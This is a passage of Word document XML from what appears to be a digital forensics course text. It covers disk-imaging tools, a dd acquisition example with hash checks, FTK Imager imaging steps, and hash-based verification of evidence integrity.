            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">dcfldd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> add hashing and logging. Careful: a wrong </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">if=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">of=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> can overwrite the evidence.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EnCase</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Windows (commercial)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="536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Complete forensic suite (acquisition, analysis, reporting); originator of the E01 format; widely used by law enforcement.</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Autopsy / The Sleuth Kit</w:t>
            </w:r>
          </w:p>
        </w:tc>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Windows, Linux (free)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="536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Mainly an </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">analysis</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> platform, but can also ingest and examine images, run keyword search and recover files.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="1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rPr>
          <w:cantSplit w:val="false"/>
        </w:trP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Example: creating a raw image with dd (Linux, drive attached through a write blocker)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo dd if=/dev/sdb of=/evidence/case01_usb.dd bs=4M conv=noerror,sync status=progress</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo md5sum  /dev/sdb  /evidence/case01_usb.dd</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="260"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo sha256sum /dev/sdb /evidence/case01_usb.dd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Here </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the input (the evidence drive), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the output image file, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">bs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the block size, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">conv=noerror,sync</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> tells dd to continue past read errors and pad the missing parts with zeros so the image stays the same size.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps for imaging a drive with FTK Imager</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Connect the suspect device through a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">write blocker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and confirm that it is read-only.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Start FTK Imager and choose </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">File → Create Disk Image</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Select the source type — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Physical Drive</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (whole device) is preferred over Logical Drive, because it includes everything. Select the evidence drive.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Choose the destination image type (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">E01</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is common) and enter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">case details</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: case number, evidence number, description, examiner name, notes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Select the destination folder (on a clean, sufficiently large drive) and file name; choose compression and fragment size if needed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Tick </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify images after they are created</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and start the process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When finished, FTK Imager shows the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">computed and stored hash values</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. If they match, the image is verified. Save the verification report (text/PDF) with the case file.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Fill in the chain-of-custody form and store the original safely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.6 Hash Verification and Evidence Integrity</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hash function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> takes any amount of data and produces a short, fixed-length string of characters called a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">hash value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or digest). It works like a digital fingerprint of the data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The same data always gives the same hash.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Changing even </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">one bit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the data produces a completely different hash.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">It is one-way — you cannot rebuild the data from the hash.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Different data should (practically) never give the same hash.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="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2437"/>
        <w:gridCol w:w="4872"/>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Algorithm</w:t>
            </w:r>
          </w:p>
        </w:tc>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Hash length</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="487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Status in forensics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MD5</w:t>
            </w:r>
          </w:p>
        </w:tc>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128-bit (32 hex characters)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="487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Fast and still widely used for integrity checks, but cryptographically </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">broken</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> — it is possible to create two different files with the same MD5 (a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">collision</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">).</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SHA-1</w:t>
            </w:r>
          </w:p>
        </w:tc>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160-bit (40 hex characters)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="487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Stronger than MD5, but also shown to be vulnerable to collisions. Still recorded in many labs for compatibility.</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SHA-256</w:t>
            </w:r>
          </w:p>
        </w:tc>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256-bit (64 hex characters)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="487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Part of the SHA-2 family; currently considered secure. Preferred for new work.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">How hash verification works</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">■ Hashing during imaging</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rPr>
          <w:cantSplit/>
        </w:trPr>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Hash the source drive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Create image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Hash the image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Compare the two values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Record in report</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Hashes match</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → the image is an exact copy of the source at the time of acquisition.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Hashes differ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → something changed (read error, faulty cable, tampering). Investigate and, if needed, re-image.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
